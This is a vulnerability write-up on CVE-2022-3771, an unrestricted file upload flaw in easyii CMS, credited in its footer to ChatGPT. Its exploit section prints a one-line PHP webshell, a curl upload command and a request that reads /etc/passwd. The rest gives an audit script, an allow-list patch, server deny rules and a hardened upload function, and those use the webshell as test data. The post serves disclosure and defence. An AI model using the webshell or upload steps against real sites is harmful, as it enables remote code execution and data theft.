In late October 2022 a vulnerability was published for easyii CMS, tracked as CVE-2022-3771 (VulDB entry VDB-212501). It allows files of any type to be uploaded through the CMS's "Upload" helper, so anyone who can reach the upload form can drop a PHP script into a web-accessible directory. In this post we break down what went wrong, how the flaw is abused, and how to mitigate it.
What is easyii CMS?
easyii CMS is an open-source content management system built on the Yii2 framework and aimed at small-to-medium web projects that value simplicity over a large feature set.
The Vulnerability: Unrestricted File Upload
The root of the issue is in helpers/Upload.php, which handles file uploads for admin users. The helper performs effectively no validation of the uploaded file: neither the extension nor the content is checked, so it accepts *any type of file*, including PHP scripts.
Where's the Problem?
The function responsible looks roughly like this (simplified for clarity):
// helpers/Upload.php (simplified)
public static function upload($file) {
    // extension is copied straight from the browser-supplied filename
    $fileName = uniqid() . '.' . $file->extension;
    $filePath = Yii::getAlias('@webroot') . '/uploads/' . $fileName;
    // no extension allow-list, no content check, no size limit before saving
    if ($file->saveAs($filePath)) {
        return '/uploads/' . $fileName;
    }
    return false;
}
Nothing constrains what gets saved: the extension comes from the client-supplied filename, there is no allow-list of permitted types, and nothing inspects the content. The missing size limit is a secondary problem next to that.
The consequence is that an attacker can upload a PHP file, a .htaccess, or any other file, and the CMS will save it under the web-accessible /uploads directory, where a default PHP setup will execute it.
Exploit Example: How an Attacker Might Abuse This
Suppose an attacker can reach the file upload form (for example, the image upload in the CMS admin). Because the helper backs the admin area, this normally means an admin session, obtained through weak or leaked credentials or some other foothold in the back end; the flaw itself is the missing validation, not the access. Using Burp Suite or curl, they POST a file such as shell.php containing:
<?php system($_GET['cmd']); ?>
The helper stores it under a uniqid()-based name and returns the resulting path, so the attacker reads the stored name back from the upload response (we write /uploads/shell.php below for readability). They then request
http://<victim-site>/uploads/shell.php?cmd=id
Spaces in the command must be URL-encoded, e.g. cmd=cat%20/etc/passwd. If the web server executes PHP under /uploads, the response contains the command output and the attacker has code execution as the web server user.
Here's a simple curl example to upload a webshell (the form field name and endpoint path depend on the form; the admin session cookie is included so the request is accepted):
curl -b "<admin-session-cookie>" -F "file=@shell.php" http://<victim-site>/path/to/upload
Now open the returned path under http://<victim-site>/uploads/ in a browser or via curl, with a cmd parameter, to execute system commands.
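If you suspect an instance has already been hit, the first check is whether anything executable is sitting under the upload directory. The audit script below is an added example written for this post, not part of easyii CMS. It assumes the image-only upload policy and the web/uploads layout discussed above, and it builds its own sample directory (constructed data) so it runs stand-alone with the PHP CLI.

```php
<?php
// Added example, not easyii CMS code. Audits an upload directory for files
// that an image-only upload form should never have produced.
declare(strict_types=1);

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Returns a list of [path, reason] findings for the given directory tree.
function auditUploads(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $info) {
        $path = $info->getPathname();
        $name = $info->getFilename();
        $ext  = strtolower($info->getExtension());

        // Dotfiles such as .htaccess or .user.ini change server behaviour.
        if ($name[0] === '.') {
            $findings[] = [$path, 'dotfile'];
            continue;
        }
        // Anything outside the image allow-list (shell.php, shell.phtml, ...).
        if (!in_array($ext, ALLOWED_EXT, true)) {
            $findings[] = [$path, "disallowed extension .$ext"];
            continue;
        }
        // Extension looks fine: the header must parse as an image ...
        if (@getimagesize($path) === false) {
            $findings[] = [$path, 'extension/content mismatch'];
            continue;
        }
        // ... and no PHP open tag may be embedded after the image data (polyglot).
        $head = file_get_contents($path, false, null, 0, 65536);
        if ($head !== false && preg_match('/<\?(php|=)/i', $head)) {
            $findings[] = [$path, 'PHP tag inside image'];
        }
    }
    return $findings;
}

// --- Constructed sample directory so the script runs offline ---
$tmp = sys_get_temp_dir() . '/uploads_audit_' . bin2hex(random_bytes(4));
mkdir($tmp);
// 1x1 transparent PNG: a genuine image that should pass every check.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
file_put_contents("$tmp/ok.png", $png);
file_put_contents("$tmp/shell.php", '<?php system($_GET["cmd"]); ?>');
file_put_contents("$tmp/.htaccess", "AddType application/x-httpd-php .png\n");
file_put_contents("$tmp/fake.jpg", '<?php echo 1; ?>');                       // wrong magic bytes
file_put_contents("$tmp/poly.png", $png . '<?php system($_GET["cmd"]); ?>'); // code appended to a real image

foreach (auditUploads($tmp) as [$path, $reason]) {
    printf("%-28s %s\n", $reason, basename($path));
}

// Remove the constructed sample directory again.
foreach (new DirectoryIterator($tmp) as $f) {
    if (!$f->isDot()) {
        unlink($f->getPathname());
    }
}
rmdir($tmp);
```

Run it as `php audit.php` after pointing `$tmp` at the real upload directory. Of the constructed files only ok.png is silent; the other four are reported, each for a different reason, which is the point: an extension check alone would have passed fake.jpg and poly.png, and a content check alone would have passed .htaccess.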
References and Further Reading
- Original easyii CMS Repo
- Vuldb Advisory (VDB-212501)
- Exploit Details at exploit-db (if available)
- OWASP Unrestricted File Upload
How to Protect Your Site
If you run easyii CMS, check the project repository for a fixed release and update. If no fix is available, patch the helper yourself: reject anything that is not on a short extension allow-list, and do it before saveAs() is called, not after:
$allowed = ['jpg', 'jpeg', 'png', 'gif'];
// strict comparison, lower-cased so "PHP" or "Php" cannot slip past
if (!in_array(strtolower($file->extension), $allowed, true)) {
    throw new \Exception('Invalid file type!');
}
The extension still comes from the client, so also verify the content (magic bytes and a decodable image header) and generate the stored filename yourself rather than reusing any part of the uploaded name.
Also, never allow direct execution of files in uploads. On Apache, deny PHP handling for the directory; the rule belongs in the server configuration, because a .htaccess file inside /uploads is exactly what an unrestricted upload lets an attacker overwrite:
# Apache 2.4, in the vhost or in /uploads/.htaccess (needs AllowOverride for that directory)
<FilesMatch "\.(php|phtml|phar)$">
Require all denied
</FilesMatch>
On Apache 2.2 the directive is `Deny from all` instead of `Require all denied`. nginx ignores .htaccess entirely, so there the equivalent is a `location` block for /uploads that never passes requests to PHP-FPM. Better still, store uploads outside the web root and serve them through a controller.
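Putting the three mitigations together, here is a hardened replacement for the upload logic. It is an added example written for this post, not the project's own helper: it is plain PHP with no Yii dependency, and the two inputs it takes are assumed to be fed from Yii's `UploadedFile` (`$file->tempName` and `$file->name`); in a real request handler `move_uploaded_file()` replaces the `rename()` used here. The sample inputs at the bottom are constructed so the script runs stand-alone with the PHP CLI.

```php
<?php
// Added example, not the easyii CMS helper. Allow-list the extension, verify the
// content really is an image of that type, discard the client's filename, and
// store under a name we generate.
declare(strict_types=1);

const IMAGE_TYPES = [          // extension => MIME type that fileinfo must report
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate and store an uploaded image.
 *   $tempPath   uploaded temp file (assumed: Yii's $file->tempName)
 *   $clientName filename sent by the browser (assumed: Yii's $file->name)
 *   $uploadDir  destination directory, ideally outside the web root
 * Returns the stored file name, or throws for anything that is not a plain image.
 */
function storeImageUpload(string $tempPath, string $clientName, string $uploadDir): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(IMAGE_TYPES[$ext])) {
        throw new RuntimeException("extension .$ext not allowed");
    }
    // Check 1: magic bytes via fileinfo; the client's Content-Type header is ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tempPath);
    if ($mime !== IMAGE_TYPES[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    // Check 2: the image header must actually parse.
    if (@getimagesize($tempPath) === false) {
        throw new RuntimeException('file is not a decodable image');
    }
    // Check 3: reject polyglots that carry a PHP open tag after valid image data.
    $data = file_get_contents($tempPath);
    if ($data === false || preg_match('/<\?(php|=)/i', $data)) {
        throw new RuntimeException('embedded PHP tag');
    }
    // The stored name is ours: no traversal, no dotfiles, no shell.php.png tricks.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = rtrim($uploadDir, '/') . '/' . $stored;
    if (!rename($tempPath, $dest)) {   // move_uploaded_file() in a real handler
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);                // readable, never executable
    return $stored;
}

// --- Constructed inputs so this runs stand-alone ---
$dir = sys_get_temp_dir() . '/hardened_' . bin2hex(random_bytes(4));
mkdir($dir);
// 1x1 transparent PNG: the only genuine image below.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$cases = [
    'photo.png'     => $png,
    'shell.php'     => '<?php system($_GET["cmd"]); ?>',
    'shell.php.png' => '<?php system($_GET["cmd"]); ?>',   // allowed extension, PHP content
    'mislabeled.gif'=> $png,                               // gif extension, png bytes
    'sneaky.png'    => $png . '<?php system($_GET["cmd"]); ?>',
];
foreach ($cases as $name => $bytes) {
    $tmp = tempnam($dir, 'up');
    file_put_contents($tmp, $bytes);
    try {
        printf("%-15s stored as %s\n", $name, storeImageUpload($tmp, $name, $dir));
    } catch (RuntimeException $e) {
        printf("%-15s rejected: %s\n", $name, $e->getMessage());
        unlink($tmp);
    }
}
```

Only photo.png is stored; the four others are each rejected by a different check, and the stored name never contains anything the client chose. The chmod is belt-and-braces: mod_php and PHP-FPM decide what to execute by extension and handler mapping, not by the execute bit, which is why the server-side deny rule above is still required.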
Conclusion
CVE-2022-3771 in easyii CMS is a textbook example of why file upload validation is critical: one helper that trusts the client-supplied filename turns an admin upload form into remote code execution. If you manage any easyii CMS sites, patch or mitigate now, audit the upload directory for files that should not be there, and make sure the web server cannot execute anything under it.
Stay safe, and always validate your inputs: the extension, the content, and the name you store under.
*Exclusive text by ChatGPT. Content adapted from public vulnerability sources. For official updates, check the original repository and security advisories.*
Timeline
Published on: 10/31/2022 14:15:00 UTC
Last modified on: 11/01/2022 14:08:00 UTC